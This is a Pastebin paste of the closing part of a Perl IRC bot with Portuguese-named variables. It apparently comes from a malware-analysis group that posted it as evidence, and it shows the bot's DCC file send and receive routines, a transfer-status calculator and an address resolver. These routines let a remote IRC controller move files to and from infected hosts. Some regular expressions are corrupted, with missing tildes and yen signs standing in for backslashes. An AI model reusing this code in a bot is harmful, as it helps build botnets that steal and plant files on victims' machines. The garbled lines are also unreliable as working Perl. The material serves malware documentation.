  769.           $DCC{$fh}{curbyte} = $bytes_sended;
  770.           if ($bytes_sended == $bytes) {
  771.              $fh->close;
  772.              $dcc_sel->remove($fh);
  773.              $DCC{$fh}{status} = "Enviado";
  774.              $DCC{$fh}{ftime} = time;
  775.              next;
  776.           }
  777.           open(SENDFILE, "< $arquivo");
  778.           seek(SENDFILE, $bytes_sended, 0);
  779.           my $send_bytes;
  780.           read(SENDFILE, $send_bytes, 1024);
  781.           print $fh "$send_bytes";
  782.           close(SENDFILE);
  783.      }
  784.    }
  785. }
  786.  
  787. sub SEND {
  788.   my ($nick, $arquivo) = @_;
  789.   unless (-r "$arquivo") {
  790.     return(0);
  791.   }
  792.   my $dccark = $arquivo;
  793.   $dccark =s/[.*¥/](¥S+)/$1/;
  794.   my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
  795.   my $longip = unpack("N",inet_aton($meuip));
  796.   my @filestat = stat($arquivo);
  797.   my $size_total=$filestat[7];
  798.   if ($size_total == 0) {
  799.      return(0);
  800.   }
  801.   my ($porta, $sendsock);
  802.   do {
  803.     $porta = int rand(64511);
  804.     $porta += 1024;
  805.     $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
  806.   } until $sendsock;
  807.   $DCC{$sendsock}{tipo} = 'send';
  808.   $DCC{$sendsock}{nick} = $nick;
  809.   $DCC{$sendsock}{bytes} = $size_total;
  810.   $DCC{$sendsock}{arquivo} = $arquivo;
  811.   &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
  812. }
  813. sub GET {
  814.   my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
  815.   return(0) if (-e "$arquivo");
  816.   if (open(FILE, "> $arquivo")) {
  817.      close FILE;
  818.   } else {
  819.     return(0);
  820.   }
  821.   my $dccip=fixaddr($dcclongip);
  822.   return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
  823.   my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
  824.   $dccsock->autoflush(1);
  825.   $dcc_sel->add($dccsock);
  826.   $DCC{$dccsock}{tipo} = 'get';
  827.   $DCC{$dccsock}{itime} = time;
  828.   $DCC{$dccsock}{nick} = $nick;
  829.   $DCC{$dccsock}{bytes} = $bytes;
  830.   $DCC{$dccsock}{curbyte} = 0;
  831.   $DCC{$dccsock}{arquivo} = $arquivo;
  832.   $DCC{$dccsock}{ip} = $dccip;
  833.   $DCC{$dccsock}{porta} = $dccporta;
  834.   $DCC{$dccsock}{status} = "Recebendo";
  835. }
  836. sub Status {
  837.   my $socket = shift;
  838.   my $sock_tipo = $DCC{$socket}{tipo};
  839.   unless (lc($sock_tipo) eq "chat") {
  840.     my $nick = $DCC{$socket}{nick};
  841.     my $arquivo = $DCC{$socket}{arquivo};
  842.     my $itime = $DCC{$socket}{itime};
  843.     my $ftime = time;
  844.     my $status = $DCC{$socket}{status};
  845.     $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
  846.  
  847.     my $d_time = $ftime-$itime;
  848.  
  849.     my $cur_byte = $DCC{$socket}{curbyte};
  850.     my $bytes_total =  $DCC{$socket}{bytes};
  851.  
  852.     my $rate = 0;
  853.     $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
  854.     my $porcen = ($cur_byte*100)/$bytes_total;
  855.  
  856.     my ($r_duv, $p_duv);
  857.     if ($rate =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  858.        $r_duv = $3; $r_duv++ if $4 >= 5;
  859.        $rate = "$1¥.$2"."$r_duv";
  860.     }
  861.     if ($porcen =/^(¥d+)¥.(¥d)(¥d)(¥d)/) {
  862.        $p_duv = $3; $p_duv++ if $4 >= 5;
  863.        $porcen = "$1¥.$2"."$p_duv";
  864.     }
  865.     return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
  866.   }
  867.   return(0);
  868. }
  869.  
  870. sub fixaddr {
  871.     my ($address) = @_;
  872.  
  873.     chomp $address;
  874.     if ($address =/^¥d+$/) {
  875.         return inet_ntoa(pack "N", $address);
  876.     } elsif ($address =/^[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}¥.[12]?¥d{1,2}$/) {
  877.         return $address;
  878.     } elsif ($address =tr/a-zA-Z//) {
  879.         return inet_ntoa(((gethostbyname($address))[4])[0]);
  880.     } else {
  881.         return;
  882.     }
  883. }
  884.  
  885. # ---- end of evidence----
  886.  
  887. #----
  888. #MalwareMustDie
  889. #"Thou Shalt not Hack"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top